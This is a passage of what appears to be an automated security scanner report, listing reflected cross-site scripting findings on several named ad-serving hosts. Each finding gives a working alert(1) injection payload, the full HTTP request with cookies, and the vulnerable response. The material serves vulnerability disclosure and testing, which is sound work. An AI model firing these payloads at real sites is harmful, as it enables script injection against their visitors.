The value of the bannerCreativeAdModuleId request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c0260"><script>alert(1)</script>92954893223 was submitted in the bannerCreativeAdModuleId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp?bannerCreativeAdModuleId=c0260"><script>alert(1)</script>92954893223&siteId=55&syndicationOutletId=49160&campaignId=6468&adRotationId=13047&campaignAccountId=1&campaignBrandId=1054&campaignClientId=69 HTTP/1.1
Host: cache.vindicosuite.com
Proxy-Connection: keep-alive
Referer: http://syndicated.mondominishows.com/custom/vertical600iframe.php?pubsite_id=15009&pr=15246f78d6%22%3E%3Cscript%3Ealert(1)%3C/script%3E69a7616f754
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOSUITEAUDIENCE=%7B%22PL%22%3A%7B%223BBC8FBC%2DC6A8%2D43A6%2DB65C%2D2405955B79FE%22%3A%7B%2253398251%2DC5D1%2D4466%2D84FA%2D7CEE6AF3F691%22%3A%221295658149%22%7D%7D%7D; VINDICOAUDIENCEISSUEDIDENTITY=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; vpp=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; 10aa51b8-16d7-4be9-8b5a-488ee3c949fc={1296137382377:InstreamImpression_0:6146|14|2080|45439|14942|33453|10|2204:2}{1296137388154:InstreamImpression_25:6146|14|2080|45439|14942|33453|10|2204:2}{1296137389177:InstreamImpression_50:6146|14|2080|45439|14942|33453|10|2204:2}{1296137394130:InstreamImpression_75:6146|14|2080|45439|14942|33453|10|2204:2}{1296137398881:InstreamImpression_100:6146|14|2080|45439|14942|33453|10|2204:1}{1296749649702:InstreamImpression_0:5745|413|1574|42244|14160|30521|868|2293:1}

Response

HTTP/1.1 500 Internal Server Error
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Length: 2584
Cache-Control: private, max-age=60
Date: Mon, 14 Feb 2011 01:40:30 GMT
Connection: close
Vary: Accept-Encoding

<html>
<head>
<style>
img {
border : 0px;

...[SNIP]...
<iframe src = "http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/?siteId=55&syndicationOutletId=49160&campaignId=6468&adRotationId=13047&bannerCreativeAdModuleId=c0260"><script>alert(1)</script>92954893223" Class = "TrackingFrame">
...[SNIP]...

1.138. http://cache.vindicosuite.com/Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp [campaignId parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://cache.vindicosuite.com
Path:	/Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp

Issue detail

The value of the campaignId request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff6ed"><script>alert(1)</script>f91a4c37806 was submitted in the campaignId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp?bannerCreativeAdModuleId=21772&siteId=55&syndicationOutletId=49160&campaignId=6468ff6ed"><script>alert(1)</script>f91a4c37806&adRotationId=13047&campaignAccountId=1&campaignBrandId=1054&campaignClientId=69 HTTP/1.1
Host: cache.vindicosuite.com
Proxy-Connection: keep-alive
Referer: http://syndicated.mondominishows.com/custom/vertical600iframe.php?pubsite_id=15009&pr=15246f78d6%22%3E%3Cscript%3Ealert(1)%3C/script%3E69a7616f754
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOSUITEAUDIENCE=%7B%22PL%22%3A%7B%223BBC8FBC%2DC6A8%2D43A6%2DB65C%2D2405955B79FE%22%3A%7B%2253398251%2DC5D1%2D4466%2D84FA%2D7CEE6AF3F691%22%3A%221295658149%22%7D%7D%7D; VINDICOAUDIENCEISSUEDIDENTITY=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; vpp=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; 10aa51b8-16d7-4be9-8b5a-488ee3c949fc={1296137382377:InstreamImpression_0:6146|14|2080|45439|14942|33453|10|2204:2}{1296137388154:InstreamImpression_25:6146|14|2080|45439|14942|33453|10|2204:2}{1296137389177:InstreamImpression_50:6146|14|2080|45439|14942|33453|10|2204:2}{1296137394130:InstreamImpression_75:6146|14|2080|45439|14942|33453|10|2204:2}{1296137398881:InstreamImpression_100:6146|14|2080|45439|14942|33453|10|2204:1}{1296749649702:InstreamImpression_0:5745|413|1574|42244|14160|30521|868|2293:1}

Response

HTTP/1.1 200 OK
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Cache-Control: private, max-age=60
Date: Mon, 14 Feb 2011 01:40:34 GMT
Connection: close
Content-Length: 3930

<html>
<head>
<style>
img {
border : 0px;

...[SNIP]...
<A HREF= "http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Clickthrough/?|55|49160|6468ff6ed"><script>alert(1)</script>f91a4c37806|13047|21772|http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Clickthrough/?|2045|48337|6408|15311|21516|http://ad.doubleclick.net/clk;235677179;59315198;b;pc=[TPAS_ID]" TARGET="_BLANK">
...[SNIP]...

1.139. http://cache.vindicosuite.com/Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp [campaignId parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://cache.vindicosuite.com
Path:	/Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp

Issue detail

The value of the campaignId request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 262c2"><script>alert(1)</script>cd018174bf0 was submitted in the campaignId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp?bannerCreativeAdModuleId=21772&siteId=55&syndicationOutletId=49160&campaignId=262c2"><script>alert(1)</script>cd018174bf0&adRotationId=13047&campaignAccountId=1&campaignBrandId=1054&campaignClientId=69 HTTP/1.1
Host: cache.vindicosuite.com
Proxy-Connection: keep-alive
Referer: http://syndicated.mondominishows.com/custom/vertical600iframe.php?pubsite_id=15009&pr=15246f78d6%22%3E%3Cscript%3Ealert(1)%3C/script%3E69a7616f754
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOSUITEAUDIENCE=%7B%22PL%22%3A%7B%223BBC8FBC%2DC6A8%2D43A6%2DB65C%2D2405955B79FE%22%3A%7B%2253398251%2DC5D1%2D4466%2D84FA%2D7CEE6AF3F691%22%3A%221295658149%22%7D%7D%7D; VINDICOAUDIENCEISSUEDIDENTITY=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; vpp=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; 10aa51b8-16d7-4be9-8b5a-488ee3c949fc={1296137382377:InstreamImpression_0:6146|14|2080|45439|14942|33453|10|2204:2}{1296137388154:InstreamImpression_25:6146|14|2080|45439|14942|33453|10|2204:2}{1296137389177:InstreamImpression_50:6146|14|2080|45439|14942|33453|10|2204:2}{1296137394130:InstreamImpression_75:6146|14|2080|45439|14942|33453|10|2204:2}{1296137398881:InstreamImpression_100:6146|14|2080|45439|14942|33453|10|2204:1}{1296749649702:InstreamImpression_0:5745|413|1574|42244|14160|30521|868|2293:1}

Response

HTTP/1.1 200 OK
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Cache-Control: private, max-age=60
Date: Mon, 14 Feb 2011 01:40:34 GMT
Connection: close
Content-Length: 3922

<html>
<head>
<style>
img {
border : 0px;

...[SNIP]...
<iframe src = "http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/?siteId=55&syndicationOutletId=49160&campaignId=262c2"><script>alert(1)</script>cd018174bf0&adRotationId=13047&bannerCreativeAdModuleId=21772" Class = "TrackingFrame">
...[SNIP]...

1.140. http://cache.vindicosuite.com/Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp [siteId parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://cache.vindicosuite.com
Path:	/Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp

Issue detail

The value of the siteId request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b668a"><script>alert(1)</script>75e7f948bb9 was submitted in the siteId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp?bannerCreativeAdModuleId=21772&siteId=b668a"><script>alert(1)</script>75e7f948bb9&syndicationOutletId=49160&campaignId=6468&adRotationId=13047&campaignAccountId=1&campaignBrandId=1054&campaignClientId=69 HTTP/1.1
Host: cache.vindicosuite.com
Proxy-Connection: keep-alive
Referer: http://syndicated.mondominishows.com/custom/vertical600iframe.php?pubsite_id=15009&pr=15246f78d6%22%3E%3Cscript%3Ealert(1)%3C/script%3E69a7616f754
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOSUITEAUDIENCE=%7B%22PL%22%3A%7B%223BBC8FBC%2DC6A8%2D43A6%2DB65C%2D2405955B79FE%22%3A%7B%2253398251%2DC5D1%2D4466%2D84FA%2D7CEE6AF3F691%22%3A%221295658149%22%7D%7D%7D; VINDICOAUDIENCEISSUEDIDENTITY=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; vpp=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; 10aa51b8-16d7-4be9-8b5a-488ee3c949fc={1296137382377:InstreamImpression_0:6146|14|2080|45439|14942|33453|10|2204:2}{1296137388154:InstreamImpression_25:6146|14|2080|45439|14942|33453|10|2204:2}{1296137389177:InstreamImpression_50:6146|14|2080|45439|14942|33453|10|2204:2}{1296137394130:InstreamImpression_75:6146|14|2080|45439|14942|33453|10|2204:2}{1296137398881:InstreamImpression_100:6146|14|2080|45439|14942|33453|10|2204:1}{1296749649702:InstreamImpression_0:5745|413|1574|42244|14160|30521|868|2293:1}

Response

HTTP/1.1 200 OK
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Cache-Control: private, max-age=60
Date: Mon, 14 Feb 2011 01:40:31 GMT
Connection: close
Content-Length: 3926

<html>
<head>
<style>
img {
border : 0px;

...[SNIP]...
<iframe src = "http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/?siteId=b668a"><script>alert(1)</script>75e7f948bb9&syndicationOutletId=49160&campaignId=6468&adRotationId=13047&bannerCreativeAdModuleId=21772" Class = "TrackingFrame">
...[SNIP]...

1.141. http://cache.vindicosuite.com/Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp [siteId parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://cache.vindicosuite.com
Path:	/Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp

Issue detail

The value of the siteId request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5449"><script>alert(1)</script>4c565f3c010 was submitted in the siteId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp?bannerCreativeAdModuleId=21772&siteId=55e5449"><script>alert(1)</script>4c565f3c010&syndicationOutletId=49160&campaignId=6468&adRotationId=13047&campaignAccountId=1&campaignBrandId=1054&campaignClientId=69 HTTP/1.1
Host: cache.vindicosuite.com
Proxy-Connection: keep-alive
Referer: http://syndicated.mondominishows.com/custom/vertical600iframe.php?pubsite_id=15009&pr=15246f78d6%22%3E%3Cscript%3Ealert(1)%3C/script%3E69a7616f754
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOSUITEAUDIENCE=%7B%22PL%22%3A%7B%223BBC8FBC%2DC6A8%2D43A6%2DB65C%2D2405955B79FE%22%3A%7B%2253398251%2DC5D1%2D4466%2D84FA%2D7CEE6AF3F691%22%3A%221295658149%22%7D%7D%7D; VINDICOAUDIENCEISSUEDIDENTITY=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; vpp=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; 10aa51b8-16d7-4be9-8b5a-488ee3c949fc={1296137382377:InstreamImpression_0:6146|14|2080|45439|14942|33453|10|2204:2}{1296137388154:InstreamImpression_25:6146|14|2080|45439|14942|33453|10|2204:2}{1296137389177:InstreamImpression_50:6146|14|2080|45439|14942|33453|10|2204:2}{1296137394130:InstreamImpression_75:6146|14|2080|45439|14942|33453|10|2204:2}{1296137398881:InstreamImpression_100:6146|14|2080|45439|14942|33453|10|2204:1}{1296749649702:InstreamImpression_0:5745|413|1574|42244|14160|30521|868|2293:1}

Response

HTTP/1.1 200 OK
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Cache-Control: private, max-age=60
Date: Mon, 14 Feb 2011 01:40:31 GMT
Connection: close
Content-Length: 3930

<html>
<head>
<style>
img {
border : 0px;

...[SNIP]...
<A HREF= "http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Clickthrough/?|55e5449"><script>alert(1)</script>4c565f3c010|49160|6468|13047|21772|http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Clickthrough/?|2045|48337|6408|15311|21516|http://ad.doubleclick.net/clk;235677179;59315198;b;pc=[TPAS_ID]" TARGET="_BLANK
...[SNIP]...

1.142. http://cache.vindicosuite.com/Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp [syndicationOutletId parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://cache.vindicosuite.com
Path:	/Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp

Issue detail

The value of the syndicationOutletId request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 71bf0"><script>alert(1)</script>333ca5c3bc5 was submitted in the syndicationOutletId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp?bannerCreativeAdModuleId=21772&siteId=55&syndicationOutletId=71bf0"><script>alert(1)</script>333ca5c3bc5&campaignId=6468&adRotationId=13047&campaignAccountId=1&campaignBrandId=1054&campaignClientId=69 HTTP/1.1
Host: cache.vindicosuite.com
Proxy-Connection: keep-alive
Referer: http://syndicated.mondominishows.com/custom/vertical600iframe.php?pubsite_id=15009&pr=15246f78d6%22%3E%3Cscript%3Ealert(1)%3C/script%3E69a7616f754
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOSUITEAUDIENCE=%7B%22PL%22%3A%7B%223BBC8FBC%2DC6A8%2D43A6%2DB65C%2D2405955B79FE%22%3A%7B%2253398251%2DC5D1%2D4466%2D84FA%2D7CEE6AF3F691%22%3A%221295658149%22%7D%7D%7D; VINDICOAUDIENCEISSUEDIDENTITY=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; vpp=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; 10aa51b8-16d7-4be9-8b5a-488ee3c949fc={1296137382377:InstreamImpression_0:6146|14|2080|45439|14942|33453|10|2204:2}{1296137388154:InstreamImpression_25:6146|14|2080|45439|14942|33453|10|2204:2}{1296137389177:InstreamImpression_50:6146|14|2080|45439|14942|33453|10|2204:2}{1296137394130:InstreamImpression_75:6146|14|2080|45439|14942|33453|10|2204:2}{1296137398881:InstreamImpression_100:6146|14|2080|45439|14942|33453|10|2204:1}{1296749649702:InstreamImpression_0:5745|413|1574|42244|14160|30521|868|2293:1}

Response

HTTP/1.1 500 Internal Server Error
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Length: 2584
Cache-Control: private, max-age=60
Date: Mon, 14 Feb 2011 01:40:33 GMT
Connection: close
Vary: Accept-Encoding

<html>
<head>
<style>
img {
border : 0px;

...[SNIP]...
<iframe src = "http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/?siteId=55&syndicationOutletId=71bf0"><script>alert(1)</script>333ca5c3bc5&campaignId=6468&adRotationId=13047&bannerCreativeAdModuleId=21772" Class = "TrackingFrame">
...[SNIP]...

1.143. http://cache.vindicosuite.com/xumo/libs/vindicosuite/xumoJS/prod/vindicosuite.xumo.js.asp [coad parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://cache.vindicosuite.com
Path:	/xumo/libs/vindicosuite/xumoJS/prod/vindicosuite.xumo.js.asp

Issue detail

The value of the coad request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eb27a'%3balert(1)//3becd2a0162 was submitted in the coad parameter. This input was echoed as eb27a';alert(1)//3becd2a0162 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /xumo/libs/vindicosuite/xumoJS/prod/vindicosuite.xumo.js.asp?coad=ca,300,250eb27a'%3balert(1)//3becd2a0162 HTTP/1.1
Host: cache.vindicosuite.com
Proxy-Connection: keep-alive
Referer: http://syndicated.mondominishows.com/custom/vertical600iframe.php?pubsite_id=15009&pr=15246
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOSUITEAUDIENCE=%7B%22PL%22%3A%7B%223BBC8FBC%2DC6A8%2D43A6%2DB65C%2D2405955B79FE%22%3A%7B%2253398251%2DC5D1%2D4466%2D84FA%2D7CEE6AF3F691%22%3A%221295658149%22%7D%7D%7D; VINDICOAUDIENCEISSUEDIDENTITY=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; vpp=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; 10aa51b8-16d7-4be9-8b5a-488ee3c949fc={1296137382377:InstreamImpression_0:6146|14|2080|45439|14942|33453|10|2204:2}{1296137388154:InstreamImpression_25:6146|14|2080|45439|14942|33453|10|2204:2}{1296137389177:InstreamImpression_50:6146|14|2080|45439|14942|33453|10|2204:2}{1296137394130:InstreamImpression_75:6146|14|2080|45439|14942|33453|10|2204:2}{1296137398881:InstreamImpression_100:6146|14|2080|45439|14942|33453|10|2204:1}{1296749649702:InstreamImpression_0:5745|413|1574|42244|14160|30521|868|2293:1}

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Length: 14025
Cache-Control: private, max-age=60
Date: Mon, 14 Feb 2011 01:37:32 GMT
Connection: close

/*
* /xumo/libs/vindicosuite/xumoJS/tags/1.5.6/vindicosuite.xumo.min.js
* (c) 2010 BBE, Inc. All Rights Reserved.
* VERSION 1.5.6.4
*
*/
var VINDICOSUITE={};VINDICOSUITE.XUMO={version:"1.5.6.4",_banners:eval('[{id : "ca", width : "300" , height : "250eb27a';alert(1)//3becd2a0162"}]'),_debug:eval('false'),_min:eval('false'),_inplace:eval('true'),_inject:eval('true'),_trackingDomain:eval('false')?"64.15.238.78":"tracking.vindicosuite.com",jsfile:'/xumo/libs/vindicosuite/xumoJS/
...[SNIP]...

1.144. http://creativeby2.unicast.com/dynamic.js [pid parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://creativeby2.unicast.com
Path:	/dynamic.js

Issue detail

The value of the pid request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload ae03c(a)950fcf2715c was submitted in the pid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /dynamic.js?geo=true&pid=61576ae03c(a)950fcf2715c&vnam=select&0.32484483905136585 HTTP/1.1
Host: creativeby2.unicast.com
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VWCUK200=L020711/Q64376_12126_950_020711_1_013111_401573x401527x020711x1x1/Q64251_12096_12_020611_1_032711_400946x400941x020611x1x1/Q65909_12441_950_020611_5_020711_408677x408668x020611x5x5

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Pragma: no-cache
Content-Length: 237
Content-Type: text/javascript
Server: Footprint Distributor V4.6
X-WR-GEO-CITY:
X-WR-GEO-DMA:
X-WR-GEO-LINESPEED:
X-WR-GEO-REGION:
X-WR-GEO-ZIP:
X-WR-MODIFICATION: Content-Length
Date: Mon, 14 Feb 2011 02:19:48 GMT
Connection: keep-alive

var connection_speed_select = "broadband";
var country_select = "us"; var region_select = "texas"; var city_select = "dallas"; var zip_code_select = "75207"; var metro_code_select = "623";
VwP61576ae03c(a)950fcf2715cLoadSelect();

1.145. http://creativeby2.unicast.com/dynamic.js [vnam parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://creativeby2.unicast.com
Path:	/dynamic.js

Issue detail

The value of the vnam request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 69067(a)4f9dac9508e was submitted in the vnam parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /dynamic.js?geo=true&pid=61576&vnam=select69067(a)4f9dac9508e&0.32484483905136585 HTTP/1.1
Host: creativeby2.unicast.com
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VWCUK200=L020711/Q64376_12126_950_020711_1_013111_401573x401527x020711x1x1/Q64251_12096_12_020611_1_032711_400946x400941x020611x1x1/Q65909_12441_950_020611_5_020711_408677x408668x020611x5x5

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Pragma: no-cache
Content-Length: 332
Content-Type: text/javascript
Server: Footprint Distributor V4.6
X-WR-GEO-CITY:
X-WR-GEO-DMA:
X-WR-GEO-LINESPEED:
X-WR-GEO-REGION:
X-WR-GEO-ZIP:
X-WR-MODIFICATION: Content-Length
Date: Mon, 14 Feb 2011 02:19:53 GMT
Connection: keep-alive

var connection_speed_select69067(a)4f9dac9508e = "broadband";
var country_select69067(a)4f9dac9508e = "us"; var region_select69067(a)4f9dac9508e = "texas"; var city_select69067(a)4f9dac9508e = "dallas"; var zip_code_select69067(a)4f9dac9508e = "7
...[SNIP]...

1.146. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [$ parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/bar/v16-401/d3/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2315b"%3balert(1)//bc620037b7e was submitted in the $ parameter. This input was echoed as 2315b";alert(1)//bc620037b7e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bar/v16-401/d3/jsc/fm.js?c=1&a=0&f=&n=1120&r=13&d=9&q=&$=2315b"%3balert(1)//bc620037b7e&s=1&z=0.7238910468295217 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech;alias=microsite.microsite-2011.lifestoryphotogallery.300x250.2.1;target=_blank;kvpersonid=148615818;kvfhid=1;sub1=Betty;sub2=Garrett;grp=5119389398;misc=4469713464
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; __qca=P0-2130372027-1295906131971; ZEDOIDX=29; FFAbh=766B305,20|320_1#365; ZFFAbh=749B826,20|1643_1#382Z1483_768#365; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640:1025,196206,196207,95694|1,24,1:0,40,1:0,40,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1:0,40,1:0,42,3:0,40,1; FFgeo=5386156; PI=h884566Za747317Zc305004506%2C305004506Zs916Zt143; ZCBC=1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792:1190,2#684982,1#751890#675823#675820:1025,1#775786#834321#775734#775797#775796#834305#834300#835846#883311#835844#883313#835850:1120,1#619977|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1:0,36,1:0,38,3:0,36,1:0,36,1:0,40,1:0,41,2:0,40,1:0,40,1:0,40,1:0,41,2:0,41,2:2,40,1:0,40,1:2,40,1:0,40,1:3,40,1:0,42,1; FFcat=305,4506,17:1120,1,9; FFad=0:0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1120:2315b";alert(1)//bc620037b7e;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1120,1,9:305,4506,17;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=1:0;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
